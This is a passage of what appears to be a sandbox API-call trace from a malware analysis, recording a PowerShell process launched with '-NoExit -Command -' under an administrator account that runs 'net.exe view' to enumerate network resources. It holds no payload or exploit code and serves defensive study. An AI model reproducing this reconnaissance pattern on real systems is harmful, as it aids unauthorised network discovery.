RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.611] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.611] CoTaskMemFree (pv=0x3e4a20) [0077.614] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.614] CoTaskMemFree (pv=0x3e4a20) [0077.614] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.614] CoTaskMemFree (pv=0x3e4a20) [0077.616] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.616] CoTaskMemFree (pv=0x3e4a20) [0077.621] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.621] CoTaskMemFree (pv=0x3e4a20) [0077.683] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.683] CoTaskMemFree (pv=0x3e4a20) [0077.686] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.686] CoTaskMemFree (pv=0x3e4a20) [0077.688] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.688] CoTaskMemFree (pv=0x3e4a20) [0077.691] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.691] CoTaskMemFree (pv=0x3e4a20) [0077.693] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.693] CoTaskMemFree (pv=0x3e4a20) [0077.695] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.695] CoTaskMemFree (pv=0x3e4a20) [0077.697] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.697] CoTaskMemFree (pv=0x3e4a20) [0077.720] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.720] CoTaskMemFree (pv=0x3e4a20) [0077.800] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.800] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.800] CoTaskMemFree (pv=0x3e4a20) [0077.805] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.805] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.805] CoTaskMemFree (pv=0x3e4a20) [0077.817] CoTaskMemAlloc (cb=0x20e) returned 0x1b3c2690 [0077.817] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b3c2690 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.817] CoTaskMemFree (pv=0x1b3c2690) [0077.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.824] SetErrorMode (uMode=0x1) returned 0x1 [0077.828] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.ps1", lpFindFileData=0x1c68daa0 | out: lpFindFileData=0x1c68daa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0077.829] SetErrorMode (uMode=0x1) returned 0x1 [0077.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.830] SetErrorMode (uMode=0x1) returned 0x1 [0077.830] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.psm1", lpFindFileData=0x1c68daa0 | out: lpFindFileData=0x1c68daa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0077.830] SetErrorMode (uMode=0x1) returned 0x1 [0077.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.831] SetErrorMode (uMode=0x1) returned 0x1 [0077.831] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.psd1", lpFindFileData=0x1c68daa0 | out: lpFindFileData=0x1c68daa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0077.831] SetErrorMode (uMode=0x1) returned 0x1 [0077.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.831] SetErrorMode (uMode=0x1) returned 0x1 [0077.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.COM", lpFindFileData=0x1c68daa0 | out: lpFindFileData=0x1c68daa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0077.832] SetErrorMode (uMode=0x1) returned 0x1 [0077.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.832] SetErrorMode (uMode=0x1) returned 0x1 [0077.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.EXE", lpFindFileData=0x1c68daa0 | out: lpFindFileData=0x1c68daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 0x48db30 [0077.834] FindNextFileW (in: hFindFile=0x48db30, lpFindFileData=0x1c68dab0 | out: lpFindFileData=0x1c68dab0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 0 [0077.834] FindClose (in: hFindFile=0x48db30 | out: hFindFile=0x48db30) returned 1 [0077.834] SetErrorMode (uMode=0x1) returned 0x1 [0077.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\net.exe", nBufferLength=0x105, lpBuffer=0x1c68dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\net.exe", lpFilePart=0x0) returned 0x1b [0077.837] SetErrorMode (uMode=0x1) returned 0x1 [0077.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c68ddd0 | out: lpFileInformation=0x1c68ddd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00)) returned 1 [0077.838] SetErrorMode (uMode=0x1) returned 0x1 [0077.840] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.841] CoTaskMemFree (pv=0x3e4a20) [0077.843] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.843] CoTaskMemFree (pv=0x3e4a20) [0077.849] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.850] CoTaskMemFree (pv=0x3e4a20) [0077.862] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.862] CoTaskMemFree (pv=0x3e4a20) [0077.879] CoTaskMemAlloc (cb=0x1d) returned 0x1b3e59d0 [0077.880] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x1c68dfb8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c68dfb8) returned 0x4550 [0077.933] CoTaskMemFree (pv=0x1b3e59d0) [0077.937] GetConsoleWindow () returned 0x5011c [0077.949] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.949] CoTaskMemFree (pv=0x3e4a20) [0077.953] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.953] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.953] CoTaskMemFree (pv=0x3e4a20) [0077.964] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.964] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.964] CoTaskMemFree (pv=0x3e4a20) [0077.968] CommandLineToArgvW (in: lpCmdLine=" view", pNumArgs=0x1c68e000 | out: pNumArgs=0x1c68e000) returned 0x1b3e59d0*="" [0077.971] lstrlenW (lpString="view") returned 4 [0077.972] CoTaskMemAlloc (cb=0xc) returned 0x1b3d5c10 [0077.972] RtlMoveMemory (in: Destination=0x1b3d5c10, Source=0x1b3e59ea, Length=0xa | out: Destination=0x1b3d5c10) [0077.972] CoTaskMemFree (pv=0x1b3d5c10) [0077.973] LocalFree (hMem=0x1b3e59d0) returned 0x0 [0077.975] CoTaskMemAlloc (cb=0x804) returned 0x1b3f0600 [0077.975] GetConsoleTitleW (in: lpConsoleTitle=0x1b3f0600, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0077.975] CoTaskMemFree (pv=0x1b3f0600) [0077.990] CoTaskMemAlloc (cb=0x84) returned 0x3f8220 [0077.990] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\net.exe\" view", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c68df60*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x350fc58 | out: lpCommandLine="\"C:\\Windows\\system32\\net.exe\" view", lpProcessInformation=0x350fc58*(hProcess=0x354, hThread=0x350, dwProcessId=0x5dc, dwThreadId=0x36c)) returned 1 [0077.997] CoTaskMemFree (pv=0x3f8220) [0077.999] CloseHandle (hObject=0x350) returned 1 [0077.999] CoTaskMemAlloc (cb=0x1d) returned 0x1b3e59d0 [0077.999] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\net.exe", dwFileAttributes=0x0, psfi=0x1c68e008, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c68e008) returned 0x4550 [0078.000] CoTaskMemFree (pv=0x1b3e59d0) [0078.521] GetCurrentProcess () returned 0xffffffffffffffff [0078.521] GetCurrentProcess () returned 0xffffffffffffffff [0078.522] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x354, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c68e0e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c68e0e8*=0x350) returned 1 [0090.653] CloseHandle (hObject=0x350) returned 1 [0090.661] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x1c68e158 | out: lpExitCode=0x1c68e158*=0x2) returned 1 [0090.862] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0090.870] CloseHandle (hObject=0x354) returned 1 [0091.704] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0091.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.704] CoTaskMemFree (pv=0x3e4a20) [0091.753] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0091.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0091.753] CoTaskMemFree (pv=0x3e4a20) [0092.023] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.023] CoTaskMemFree (pv=0x3e4a20) [0092.030] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.030] CoTaskMemFree (pv=0x3e4a20) [0092.082] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.083] CoTaskMemFree (pv=0x3e4a20) [0092.104] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.104] CoTaskMemFree (pv=0x3e4a20) [0092.107] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.108] CoTaskMemFree (pv=0x3e4a20) [0092.134] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.135] CoTaskMemFree (pv=0x3e4a20) [0092.198] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.198] CoTaskMemFree (pv=0x3e4a20) [0092.453] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0092.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.453] CoTaskMemFree (pv=0x3e4a20) [0092.759] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0092.760] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1c68d850 | out: lpConsoleScreenBufferInfo=0x1c68d850) returned 1 [0092.768] GetConsoleOutputCP () returned 0x1b5 [0092.770] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c68d7e0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c68d7e0) returned 0 [0092.771] GetStdHandle (nStdHandle=0xfffffff5) returned 0xe8 [0092.771] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x1c68d830 | out: lpMode=0x1c68d830) returned 0 [0092.771] GetConsoleOutputCP () returned 0x1b5 [0092.772] GetFileType (hFile=0xe8) returned 0x3 [0092.829] WriteFile (in: hFile=0xe8, lpBuffer=0x3585010*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x1c68d718, lpOverlapped=0x0 | out: lpBuffer=0x3585010*, lpNumberOfBytesWritten=0x1c68d718*=0x21, lpOverlapped=0x0) returned 1 [0092.829] WriteFile (in: hFile=0xe8, lpBuffer=0x3585010*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1c68d718, lpOverlapped=0x0 | out: lpBuffer=0x3585010*, lpNumberOfBytesWritten=0x1c68d718*=0x2, lpOverlapped=0x0) returned 1 [0093.110] GetStdHandle (nStdHandle=0xfffffff4) returned 0xec [0093.112] WriteFile (in: hFile=0xec, lpBuffer=0x1c68e194*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x1c68e078, lpOverlapped=0x0 | out: lpBuffer=0x1c68e194*, lpNumberOfBytesWritten=0x1c68e078*=0x0, lpOverlapped=0x0) returned 1 [0093.114] GetConsoleOutputCP () returned 0x1b5 [0093.665] WriteFile (in: hFile=0xec, lpBuffer=0x2fb8fc0*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x1c68ded8, lpOverlapped=0x0 | out: lpBuffer=0x2fb8fc0*, lpNumberOfBytesWritten=0x1c68ded8*=0x23, lpOverlapped=0x0) returned 1 [0093.674] SetEvent (hEvent=0x3a8) returned 1 [0093.674] SetEvent (hEvent=0x39c) returned 1 [0093.674] SetEvent (hEvent=0x3a0) returned 1 [0093.674] SetEvent (hEvent=0x3a4) returned 1 [0093.674] SetEvent (hEvent=0x394) returned 1 [0093.674] SetEvent (hEvent=0x3ac) returned 1 [0093.674] SetEvent (hEvent=0x3b0) returned 1 [0093.674] SetEvent (hEvent=0x3d0) returned 1 [0093.674] SetEvent (hEvent=0x3b8) returned 1 [0093.678] CoUninitialize () Thread: id = 17 os_tid = 0x83c [0093.736] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.739] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0093.740] VirtualQuery (in: lpAddress=0x1c60d820, lpBuffer=0x1c60e6e0, dwLength=0x30 | out: lpBuffer=0x1c60e6e0*(BaseAddress=0x1c60d000, AllocationBase=0x1bc80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.754] VirtualQuery (in: lpAddress=0x1c60dad0, lpBuffer=0x1c60e990, dwLength=0x30 | out: lpBuffer=0x1c60e990*(BaseAddress=0x1c60d000, AllocationBase=0x1bc80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.815] SetEvent (hEvent=0x3c4) returned 1 [0093.815] SetEvent (hEvent=0x358) returned 1 [0093.816] SetEvent (hEvent=0x360) returned 1 [0093.816] SetEvent (hEvent=0x364) returned 1 [0093.816] SetEvent (hEvent=0x380) returned 1 [0093.816] SetEvent (hEvent=0x374) returned 1 [0093.816] SetEvent (hEvent=0x378) returned 1 [0093.816] SetEvent (hEvent=0x37c) returned 1 [0093.816] SetEvent (hEvent=0x384) returned 1 [0093.816] CoUninitialize () Process: id = "3" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x3c267000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa24" cmd_line = "\"C:\\Windows\\system32\\net.exe\" view" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x36c Thread: id = 16 os_tid = 0x644 Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x450b1000" os_pid = "0x860" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaac" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 18 os_tid = 0x870 [0095.507] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0096.041] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0096.042] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0096.042] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0096.042] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0096.591] GetVersionExW (in: lpVersionInformation=0x10dbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dbe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.593] GetVersionExW (in: lpVersionInformation=0x10dbe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dbe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.606] GetVersionExW (in: lpVersionInformation=0x10d950*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d950*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.607] SetErrorMode (uMode=0x1) returned 0x1 [0096.608] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10dab0 | out: lpFileInformation=0x10dab0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 